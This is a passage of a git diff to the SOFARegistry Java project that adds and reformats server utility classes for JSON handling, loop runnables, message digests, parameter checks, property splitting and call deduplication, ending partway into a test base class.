RuntimeException("failed to read json to " + clazz.getName() + ", " + str, e); + } + } + + public static T read(String str, TypeReference typeReference) { + try { + return JACKSON_MAPPER.get().readValue(str, typeReference); + } catch (Throwable e) { + throw new RuntimeException( + "failed to read json to " + typeReference.toString() + ", " + str, e); + } + } + + public static String writeValueAsString(Object o) { + try { + return JACKSON_MAPPER.get().writeValueAsString(o); + } catch (Throwable e) { + throw new RuntimeException("failed to write json: " + o, e); + } + } +} diff --git a/server/common/util/src/main/java/com/alipay/sofa/registry/util/LoopRunnable.java b/server/common/util/src/main/java/com/alipay/sofa/registry/util/LoopRunnable.java new file mode 100644 index 000000000..0c3be2496 --- /dev/null +++ b/server/common/util/src/main/java/com/alipay/sofa/registry/util/LoopRunnable.java @@ -0,0 +1,93 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.util; + +import com.alipay.sofa.registry.lifecycle.Suspendable; +import com.alipay.sofa.registry.log.Logger; +import com.alipay.sofa.registry.log.LoggerFactory; + +/** + * @author yuzhi.lyz + * @version v 0.1 2020-11-30 16:51 yuzhi.lyz Exp $ + */ +public abstract class LoopRunnable implements Runnable, Suspendable { + private static final Logger LOGGER = LoggerFactory.getLogger(LoopRunnable.class); + + private volatile boolean closed = false; + + private volatile boolean suspend = false; + + public abstract void runUnthrowable(); + + public abstract void waitingUnthrowable(); + + public void close() { + closed = true; + } + + @Override + public void suspend() { + this.suspend = true; + } + + @Override + public void resume() { + this.suspend = false; + } + + @Override + public boolean isSuspended() { + return suspend; + } + + public boolean isClosed() { + return closed; + } + + public void run() { + LOGGER.info("loop-run started {}", this.getClass().getSimpleName()); + for (; ; ) { + try { + if (closed) { + LOGGER.warn("[closed] quit"); + break; + } + if (suspend) { + LOGGER.warn("[suspend] break"); + } else { + try { + runUnthrowable(); + } catch (Throwable unexpect) { + LOGGER.error("run unexpect error", unexpect); + } + } + try { + waitingUnthrowable(); + } catch (Throwable unexpect) { + LOGGER.error("waiting unexpect error", unexpect); + } + } catch (Throwable e) { + // log oom, this may be happen + try { + LOGGER.error("loop unexpect error", e); + } catch (Throwable ignored) { // NOPMD + } + } + } + LOGGER.info("loop-run exit {}, closed={}", this.getClass().getSimpleName(), closed); + } +} diff --git a/server/common/util/src/main/java/com/alipay/sofa/registry/util/MathUtils.java b/server/common/util/src/main/java/com/alipay/sofa/registry/util/MathUtils.java new file mode 100644 index 000000000..6ee9607ea --- /dev/null +++ b/server/common/util/src/main/java/com/alipay/sofa/registry/util/MathUtils.java @@ -0,0 +1,37 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.util; + +/** + * @author chen.zhu + *

Jan 12, 2021 + */ +public class MathUtils { + + /** + * Divide ceil int. dividend divisor quotient 20 / 4 = 5 + * + * @param dividend the dividend + * @param divisor the divisor + * @return the int + */ + public static int divideCeil(int dividend, int divisor) { + int result = dividend / divisor; + result += dividend % divisor == 0 ? 0 : 1; + return result; + } +} diff --git a/server/common/util/src/main/java/com/alipay/sofa/registry/util/MessageDigests.java b/server/common/util/src/main/java/com/alipay/sofa/registry/util/MessageDigests.java new file mode 100644 index 000000000..eaa909812 --- /dev/null +++ b/server/common/util/src/main/java/com/alipay/sofa/registry/util/MessageDigests.java @@ -0,0 +1,109 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.util; + +import java.nio.charset.StandardCharsets; +import java.security.MessageDigest; +import java.security.NoSuchAlgorithmException; + +/** + * This MessageDigests class provides convenience methods for obtaining thread local {@link + * MessageDigest} instances for MD5, SHA-1, and SHA-256 message digests. + * + * @author zhuoyu.sjw + * @version $Id: MessageDigests.java, v 0.1 2016-11-01 16:29 zhuoyu.sjw Exp $$ + */ +public final class MessageDigests { + + /** MD5 */ + private static final ThreadLocal MD5_DIGEST = + createThreadLocalMessageDigest("MD5"); + /** SHA_1 */ + private static final ThreadLocal SHA_1_DIGEST = + createThreadLocalMessageDigest("SHA-1"); + /** SHA_256 */ + private static final ThreadLocal SHA_256_DIGEST = + createThreadLocalMessageDigest("SHA-256"); + /** */ + private static final char[] HEX_DIGITS = "0123456789abcdef".toCharArray(); + + /** + * Create thread local message digest thread local. + * + * @param digest the digest + * @return thread local + */ + private static ThreadLocal createThreadLocalMessageDigest(final String digest) { + return ThreadLocal.withInitial( + () -> { + try { + return MessageDigest.getInstance(digest); + } catch (NoSuchAlgorithmException e) { + throw new IllegalStateException( + "unexpected exception creating MessageDigest instance for [" + digest + "]", e); + } + }); + } + + /** @return a thread local MD5 {@link MessageDigest} instance */ + public static MessageDigest md5() { + return get(MD5_DIGEST); + } + + /** @return a thread local SHA_1 {@link MessageDigest} instance */ + public static MessageDigest sha1() { + return get(SHA_1_DIGEST); + } + + /** @return a thread local SHA_256 {@link MessageDigest} instance */ + public static MessageDigest sha256() { + return get(SHA_256_DIGEST); + } + + /** + * get and reset thread local {@link MessageDigest} instance + * + * @param messageDigest threadLocalMessageDigest + * @return a thread local {@link MessageDigest} instance + */ + private static MessageDigest get(ThreadLocal messageDigest) { + MessageDigest instance = messageDigest.get(); + instance.reset(); + return instance; + } + + public static String getMd5String(String digest) { + + return toHexString(md5().digest(digest.getBytes(StandardCharsets.UTF_8))); + } + + /** + * Format a byte array as a hex string. + * + * @param bytes the input to be represented as hex. + * @return a hex representation of the input as a String. + */ + public static String toHexString(byte[] bytes) { + StringBuilder sb = new StringBuilder(2 * bytes.length); + + for (byte b : bytes) { + sb.append(HEX_DIGITS[b >> 4 & 0xf]).append(HEX_DIGITS[b & 0xf]); + } + + return sb.toString(); + } +} diff --git a/server/common/util/src/main/java/com/alipay/sofa/registry/util/NamedThreadFactory.java b/server/common/util/src/main/java/com/alipay/sofa/registry/util/NamedThreadFactory.java index c429ca42e..124b0abe8 100644 --- a/server/common/util/src/main/java/com/alipay/sofa/registry/util/NamedThreadFactory.java +++ b/server/common/util/src/main/java/com/alipay/sofa/registry/util/NamedThreadFactory.java @@ -20,46 +20,44 @@ import java.util.concurrent.atomic.AtomicInteger; /** - * * @author shangyu.wh * @version $Id: NamedThreadFactory.java, v 0.1 2018-10-11 11:25 shangyu.wh Exp $ */ public class NamedThreadFactory implements ThreadFactory { - private static final AtomicInteger POOL_NUMBER = new AtomicInteger(1); - private final AtomicInteger threadNumber = new AtomicInteger(1); - private final ThreadGroup group; - private final String namePrefix; - private final boolean isDaemon; - - public NamedThreadFactory() { - this("ThreadPool"); - } - - public NamedThreadFactory(String name) { - this(name, false); - } - - public NamedThreadFactory(String preffix, boolean daemon) { - SecurityManager s = System.getSecurityManager(); - group = (s != null) ? s.getThreadGroup() : Thread.currentThread().getThreadGroup(); - namePrefix = preffix + "-" + POOL_NUMBER.getAndIncrement() + "-thread-"; - isDaemon = daemon; - } - - /** - * Create a thread. - * - * @see ThreadFactory#newThread(Runnable) - */ - @Override - public Thread newThread(Runnable r) { - Thread t = new Thread(group, r, namePrefix + threadNumber.getAndIncrement(), 0); - t.setDaemon(isDaemon); - if (t.getPriority() != Thread.NORM_PRIORITY) { - t.setPriority(Thread.NORM_PRIORITY); - } - return t; + private static final AtomicInteger POOL_NUMBER = new AtomicInteger(1); + private final AtomicInteger threadNumber = new AtomicInteger(1); + private final ThreadGroup group; + private final String namePrefix; + private final boolean isDaemon; + + public NamedThreadFactory(String name) { + this(name, false); + } + + public NamedThreadFactory(String prefix, boolean daemon) { + SecurityManager s = System.getSecurityManager(); + group = (s != null) ? s.getThreadGroup() : Thread.currentThread().getThreadGroup(); + namePrefix = prefix + "-" + POOL_NUMBER.getAndIncrement(); + isDaemon = daemon; + } + + /** + * Create a thread. + * + * @see ThreadFactory#newThread(Runnable) + */ + @Override + public Thread newThread(Runnable r) { + Thread t = new Thread(group, r, namePrefix + threadNumber.getAndIncrement(), 0); + t.setDaemon(isDaemon); + if (t.getPriority() != Thread.NORM_PRIORITY) { + t.setPriority(Thread.NORM_PRIORITY); } + return t; + } -} \ No newline at end of file + public String getNamePrefix() { + return namePrefix; + } +} diff --git a/server/common/util/src/main/java/com/alipay/sofa/registry/util/ObjectFactory.java b/server/common/util/src/main/java/com/alipay/sofa/registry/util/ObjectFactory.java new file mode 100644 index 000000000..2c4b7ca5d --- /dev/null +++ b/server/common/util/src/main/java/com/alipay/sofa/registry/util/ObjectFactory.java @@ -0,0 +1,25 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.util; + +/** + * @author chen.zhu + *

Nov 23, 2020 + */ +public interface ObjectFactory { + V create(); +} diff --git a/server/common/util/src/main/java/com/alipay/sofa/registry/util/OsUtils.java b/server/common/util/src/main/java/com/alipay/sofa/registry/util/OsUtils.java new file mode 100644 index 000000000..b42d388a2 --- /dev/null +++ b/server/common/util/src/main/java/com/alipay/sofa/registry/util/OsUtils.java @@ -0,0 +1,39 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.util; + +/** + * @author chen.zhu + *

Nov 13, 2020 + */ +public class OsUtils { + + private static final int CPU_COUNT; + + static { + String cpuCount = System.getProperty("CPU_COUNT"); + if (cpuCount != null) { + CPU_COUNT = Integer.parseInt(cpuCount); + } else { + CPU_COUNT = Runtime.getRuntime().availableProcessors(); + } + } + + public static int getCpuCount() { + return CPU_COUNT; + } +} diff --git a/server/common/util/src/main/java/com/alipay/sofa/registry/util/ParaCheckUtil.java b/server/common/util/src/main/java/com/alipay/sofa/registry/util/ParaCheckUtil.java index a24b83928..02366bb65 100644 --- a/server/common/util/src/main/java/com/alipay/sofa/registry/util/ParaCheckUtil.java +++ b/server/common/util/src/main/java/com/alipay/sofa/registry/util/ParaCheckUtil.java @@ -17,47 +17,84 @@ package com.alipay.sofa.registry.util; import java.util.Collection; +import java.util.Objects; +import java.util.Set; +import org.apache.commons.lang.StringUtils; /** * @author qian.lqlq * @version $Id: ParaCheckUtil.java, v 0.1 2017-12-06 21:20 qian.lqlq Exp $ */ -public class ParaCheckUtil { - - /** - * check object not null - * @param param - * @param paraName - * @throws RuntimeException - */ - public static void checkNotNull(Object param, String paraName) throws RuntimeException { - if (param == null) { - throw new RuntimeException(String.format("%s is not allowed to be null", paraName)); - } +public final class ParaCheckUtil { + private ParaCheckUtil() {} + + /** + * check object not null + * + * @param param + * @param paraName + * @throws RuntimeException + */ + public static void checkNotNull(Object param, String paraName) { + if (param == null) { + throw new IllegalArgumentException( + StringFormatter.format("{} is not allowed to be null", paraName)); + } + } + + public static void checkEquals(Object actual, Object expect, String paraName) { + if (!Objects.equals(actual, expect)) { + throw new IllegalArgumentException( + StringFormatter.format("{}={} is not equals {}", paraName, actual, expect)); + } + } + + /** + * check string not blank + * + * @param param + * @param paraName + * @throws RuntimeException + */ + public static void checkNotBlank(String param, String paraName) { + if (StringUtils.isBlank(param)) { + throw new IllegalArgumentException( + StringFormatter.format("{} is not allowed to be blank", paraName)); + } + } + + /** + * check param not empty + * + * @param param + * @param paraName + * @throws RuntimeException + */ + public static void checkNotEmpty(Collection param, String paraName) { + if (param == null || param.size() == 0) { + throw new IllegalArgumentException( + StringFormatter.format("{} is not allowed to be empty", paraName)); } + } - /** - * check string not blank - * @param param - * @param paraName - * @throws RuntimeException - */ - public static void checkNotBlank(String param, String paraName) throws RuntimeException { - if (param == null || param.trim().length() == 0) { - throw new RuntimeException(String.format("%s is not allowed to be blank", paraName)); - } + public static void checkNonNegative(long v, String paraName) { + if (v < 0) { + throw new IllegalArgumentException( + StringFormatter.format("{} is not allowed to be negative, {}", paraName, v)); } + } - /** - * check param not empty - * @param param - * @param paraName - * @throws RuntimeException - */ - public static void checkNotEmpty(Collection param, String paraName) throws RuntimeException { - if (param == null || param.size() == 0) { - throw new RuntimeException(String.format("%s is not allowed to be empty", paraName)); - } + public static void checkIsPositive(long v, String paraName) { + if (v <= 0) { + throw new IllegalArgumentException( + StringFormatter.format("{} is require positive, {}", paraName, v)); } + } -} \ No newline at end of file + public static void checkContains(Set sets, Object param, String paraName) { + if (!sets.contains(param)) { + throw new IllegalArgumentException( + StringFormatter.format("{} is not contain in {}, {}", paraName, sets, param)); + } + } +} diff --git a/server/common/util/src/main/java/com/alipay/sofa/registry/util/PropertySplitter.java b/server/common/util/src/main/java/com/alipay/sofa/registry/util/PropertySplitter.java index b56f53e9c..6b3f98121 100644 --- a/server/common/util/src/main/java/com/alipay/sofa/registry/util/PropertySplitter.java +++ b/server/common/util/src/main/java/com/alipay/sofa/registry/util/PropertySplitter.java @@ -17,7 +17,6 @@ package com.alipay.sofa.registry.util; import com.google.common.base.Splitter; - import java.util.ArrayList; import java.util.Collection; import java.util.HashMap; @@ -25,74 +24,66 @@ import java.util.Map.Entry; /** - * * @author shangyu.wh * @version $Id: PropertySplitter.java, v 0.1 2018-05-03 16:29 shangyu.wh Exp $ */ public class PropertySplitter { - /** - * Example: one.example.property = KEY1:VALUE1,KEY2:VALUE2 - */ - public Map map(String property) { - if (property == null) { - return new HashMap<>(); - } - return this.map(property, ","); + /** Example: one.example.property = KEY1:VALUE1,KEY2:VALUE2 */ + public Map map(String property) { + if (property == null) { + return new HashMap<>(); } + return this.map(property, ","); + } - /** - * Example: one.example.property = KEY1:VALUE1.1,VALUE1.2|KEY2:VALUE2.1,VALUE2.2 - */ - public Map> mapOfList(String property) { - if (property == null) { - return new HashMap<>(); - } - Map map = this.map(property, "|"); - - Map> mapOfList = new HashMap<>(); - for (Entry entry : map.entrySet()) { - mapOfList.put(entry.getKey(), this.list(entry.getValue())); - } - - return mapOfList; + /** Example: one.example.property = KEY1:VALUE1.1,VALUE1.2|KEY2:VALUE2.1,VALUE2.2 */ + public Map> mapOfList(String property) { + if (property == null) { + return new HashMap<>(); } + Map map = this.map(property, "|"); - /** - * Example: one.example.property = VALUE1,VALUE2,VALUE3,VALUE4 - */ - public Collection list(String property) { - if (property == null) { - return new ArrayList<>(); - } - return this.list(property, ","); + Map> mapOfList = new HashMap<>(); + for (Entry entry : map.entrySet()) { + mapOfList.put(entry.getKey(), this.list(entry.getValue())); } - /** - * Example: one.example.property = VALUE1.1,VALUE1.2|VALUE2.1,VALUE2.2 - */ - public Collection> groupedList(String property) { - if (property == null) { - return new ArrayList<>(); - } - Collection unGroupedList = this.list(property, "|"); - - Collection> groupedList = new ArrayList<>(); - for (String group : unGroupedList) { - groupedList.add(this.list(group)); - } - - return groupedList; + return mapOfList; + } + /** Example: one.example.property = VALUE1,VALUE2,VALUE3,VALUE4 */ + public Collection list(String property) { + if (property == null) { + return new ArrayList<>(); } + return this.list(property, ","); + } - private Collection list(String property, String splitter) { - return Splitter.on(splitter).omitEmptyStrings().trimResults().splitToList(property); + /** Example: one.example.property = VALUE1.1,VALUE1.2|VALUE2.1,VALUE2.2 */ + public Collection> groupedList(String property) { + if (property == null) { + return new ArrayList<>(); } + Collection unGroupedList = this.list(property, "|"); - private Map map(String property, String splitter) { - return Splitter.on(splitter).omitEmptyStrings().trimResults().withKeyValueSeparator(":") - .split(property); + Collection> groupedList = new ArrayList<>(); + for (String group : unGroupedList) { + groupedList.add(this.list(group)); } -} \ No newline at end of file + return groupedList; + } + + private Collection list(String property, String splitter) { + return Splitter.on(splitter).omitEmptyStrings().trimResults().splitToList(property); + } + + private Map map(String property, String splitter) { + return Splitter.on(splitter) + .omitEmptyStrings() + .trimResults() + .withKeyValueSeparator(":") + .split(property); + } +} diff --git a/server/common/util/src/main/java/com/alipay/sofa/registry/util/RevisionUtils.java b/server/common/util/src/main/java/com/alipay/sofa/registry/util/RevisionUtils.java new file mode 100644 index 000000000..ffa88fc44 --- /dev/null +++ b/server/common/util/src/main/java/com/alipay/sofa/registry/util/RevisionUtils.java @@ -0,0 +1,35 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.util; + +import java.nio.charset.StandardCharsets; +import java.util.Collections; +import java.util.List; + +public final class RevisionUtils { + private RevisionUtils() {} + + public static String revisionsDigest(List keys) { + Collections.sort(keys); + StringBuilder sb = new StringBuilder(keys.size() * 64); + for (String key : keys) { + sb.append(key); + } + return MessageDigests.toHexString( + MessageDigests.md5().digest(sb.toString().getBytes(StandardCharsets.UTF_8))); + } +} diff --git a/server/common/util/src/main/java/com/alipay/sofa/registry/util/SingleFlight.java b/server/common/util/src/main/java/com/alipay/sofa/registry/util/SingleFlight.java new file mode 100644 index 000000000..7fece780b --- /dev/null +++ b/server/common/util/src/main/java/com/alipay/sofa/registry/util/SingleFlight.java @@ -0,0 +1,123 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.util; + +import java.util.concurrent.Callable; +import java.util.concurrent.ConcurrentHashMap; +import java.util.concurrent.ConcurrentMap; + +/** + * SingleFlight implements call deduplication for equal keys. + * + *

Example: + * + *

+ * public Result expensiveOperation(final Parameters parameters) throws Exception {
+ *     return singleFlight.execute(parameters, new Callable<Result>() {
+ *         @Override
+ *         public Result call() {
+ *             return expensiveOperationImpl(parameters);
+ *         }
+ *     });
+ * }
+ *
+ * private Result expensiveOperationImpl(Parameters parameters) {
+ *     // the real implementation
+ * }
+ * 
+ */ +public class SingleFlight { + + private final ConcurrentMap calls = new ConcurrentHashMap<>(); + + /** + * Execute a {@link Callable} if no other calls for the same {@code key} are currently running. + * Concurrent calls for the same {@code key} result in one caller invoking the {@link Callable} + * and sharing the result with the other callers. + * + *

The result of an invocation is not cached, only concurrent calls share the same result. + * + * @param key A unique identification of the method call. The {@code key} must be uniquely + * identifiable by it's {@link Object#hashCode()} and {@link Object#equals(Object)} methods. + * @param callable The {@link Callable} where the result can be obtained from. + * @return The result of invoking the {@link Callable}. + * @throws Exception The {@link Exception} which was thrown by the {@link Callable}. Alternatively + * a {@link InterruptedException} can be thrown if the executing {@link Thread} was + * interrupted while waiting for the result. + */ + @SuppressWarnings("unchecked") + public V execute(Object key, Callable callable) throws Exception { + Call call = calls.get(key); + if (call == null) { + call = new Call<>(); + Call other = calls.putIfAbsent(key, call); + if (other == null) { + try { + return call.exec(callable); + } finally { + calls.remove(key); + } + } else { + call = other; + } + } + return call.await(); + } + + private static class Call { + + private final Object lock = new Object(); + private boolean finished; + private V result; + private Exception exc; + + void finished(V result, Exception exc) { + synchronized (lock) { + this.finished = true; + this.result = result; + this.exc = exc; + lock.notifyAll(); + } + } + + V await() throws Exception { + synchronized (lock) { + while (!finished) { + lock.wait(); + } + if (exc != null) { + throw exc; + } + return result; + } + } + + V exec(Callable callable) throws Exception { + V result = null; + Exception exc = null; + try { + result = callable.call(); + return result; + } catch (Exception e) { + exc = e; + throw e; + } finally { + finished(result, exc); + } + } + } +} diff --git a/server/common/util/src/main/java/com/alipay/sofa/registry/util/StringFormatter.java b/server/common/util/src/main/java/com/alipay/sofa/registry/util/StringFormatter.java new file mode 100644 index 000000000..60c4cdc20 --- /dev/null +++ b/server/common/util/src/main/java/com/alipay/sofa/registry/util/StringFormatter.java @@ -0,0 +1,29 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.util; + +import org.slf4j.helpers.FormattingTuple; +import org.slf4j.helpers.MessageFormatter; + +public final class StringFormatter { + private StringFormatter() {} + + public static String format(String messagePattern, Object... argArray) { + FormattingTuple tuple = MessageFormatter.arrayFormat(messagePattern, argArray); + return tuple.getMessage(); + } +} diff --git a/server/common/util/src/main/java/com/alipay/sofa/registry/util/SystemUtils.java b/server/common/util/src/main/java/com/alipay/sofa/registry/util/SystemUtils.java new file mode 100644 index 000000000..715da6a93 --- /dev/null +++ b/server/common/util/src/main/java/com/alipay/sofa/registry/util/SystemUtils.java @@ -0,0 +1,37 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.util; + +public final class SystemUtils { + private SystemUtils() {} + + public static int getSystemInteger(String name, int def) { + String v = System.getProperty(name); + if (v == null) { + v = System.getenv(name); + } + return v == null ? def : Integer.valueOf(v); + } + + public static String getSystem(String name, String def) { + String v = System.getProperty(name); + if (v == null) { + v = System.getenv(name); + } + return v == null ? def : v; + } +} diff --git a/server/common/util/src/main/java/com/alipay/sofa/registry/util/TimestampUtil.java b/server/common/util/src/main/java/com/alipay/sofa/registry/util/TimestampUtil.java new file mode 100644 index 000000000..ab97f27d0 --- /dev/null +++ b/server/common/util/src/main/java/com/alipay/sofa/registry/util/TimestampUtil.java @@ -0,0 +1,31 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.util; + +import java.sql.Timestamp; + +/** + * @author xiaojian.xj + * @version $Id: TimestampUtil.java, v 0.1 2021年03月01日 15:55 xiaojian.xj Exp $ + */ +public final class TimestampUtil { + private TimestampUtil() {} + + public static long getNanosLong(Timestamp timestamp) { + return timestamp.getTime() / 1000 * 1000000000 + timestamp.getNanos(); + } +} diff --git a/server/common/util/src/main/java/com/alipay/sofa/registry/util/VersionsMapUtils.java b/server/common/util/src/main/java/com/alipay/sofa/registry/util/VersionsMapUtils.java index 2c09283af..56cfc3b6a 100644 --- a/server/common/util/src/main/java/com/alipay/sofa/registry/util/VersionsMapUtils.java +++ b/server/common/util/src/main/java/com/alipay/sofa/registry/util/VersionsMapUtils.java @@ -23,24 +23,24 @@ * @since 2019/2/12 */ public class VersionsMapUtils { - public static boolean checkAndUpdateVersions(Map versionsMap, String versionKey, - Long version) { - while (true) { - Long oldValue = versionsMap.get(versionKey); - if (oldValue == null) { - // Add firstly - if (versionsMap.putIfAbsent(versionKey, version) == null) { - return true; - } - } else { - if (version > oldValue) { - if (versionsMap.replace(versionKey, oldValue, version)) { - return true; - } - } else { - return false; - } - } + public static boolean checkAndUpdateVersions( + Map versionsMap, String versionKey, Long version) { + while (true) { + Long oldValue = versionsMap.get(versionKey); + if (oldValue == null) { + // Add firstly + if (versionsMap.putIfAbsent(versionKey, version) == null) { + return true; } + } else { + if (version > oldValue) { + if (versionsMap.replace(versionKey, oldValue, version)) { + return true; + } + } else { + return false; + } + } } + } } diff --git a/server/common/util/src/main/java/com/alipay/sofa/registry/util/WakeUpLoopRunnable.java b/server/common/util/src/main/java/com/alipay/sofa/registry/util/WakeUpLoopRunnable.java new file mode 100644 index 000000000..c81363356 --- /dev/null +++ b/server/common/util/src/main/java/com/alipay/sofa/registry/util/WakeUpLoopRunnable.java @@ -0,0 +1,35 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.util; + +import java.util.concurrent.SynchronousQueue; +import java.util.concurrent.TimeUnit; + +public abstract class WakeUpLoopRunnable extends LoopRunnable { + private final SynchronousQueue bell = new SynchronousQueue<>(); + + @Override + public void waitingUnthrowable() { + ConcurrentUtils.pollUninterruptibly(bell, getWaitingMillis(), TimeUnit.MILLISECONDS); + } + + public abstract int getWaitingMillis(); + + public void wakeup() { + bell.offer(this); + } +} diff --git a/server/common/util/src/test/java/com/alipay/sofa/registry/AbstractTestBase.java b/server/common/util/src/test/java/com/alipay/sofa/registry/AbstractTestBase.java new file mode 100644 index 000000000..bca410a84 --- /dev/null +++ b/server/common/util/src/test/java/com/alipay/sofa/registry/AbstractTestBase.java @@ -0,0 +1,288 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry; + +import com.alipay.sofa.registry.log.Logger; +import com.alipay.sofa.registry.log.LoggerFactory; +import com.alipay.sofa.registry.observer.Observable; +import com.alipay.sofa.registry.observer.UnblockingObserver; +import com.alipay.sofa.registry.util.DefaultExecutorFactory; +import com.alipay.sofa.registry.util.NamedThreadFactory; +import io.netty.util.ResourceLeakDetector; +import java.io.IOException; +import java.lang.reflect.Field; +import java.lang.reflect.InvocationTargetException; +import java.lang.reflect.Modifier; +import java.net.InetSocketAddress; +import java.net.ServerSocket; +import java.util.Collections; +import java.util.Map; +import java.util.Random; +import java.util.Set; +import java.util.concurrent.*; +import 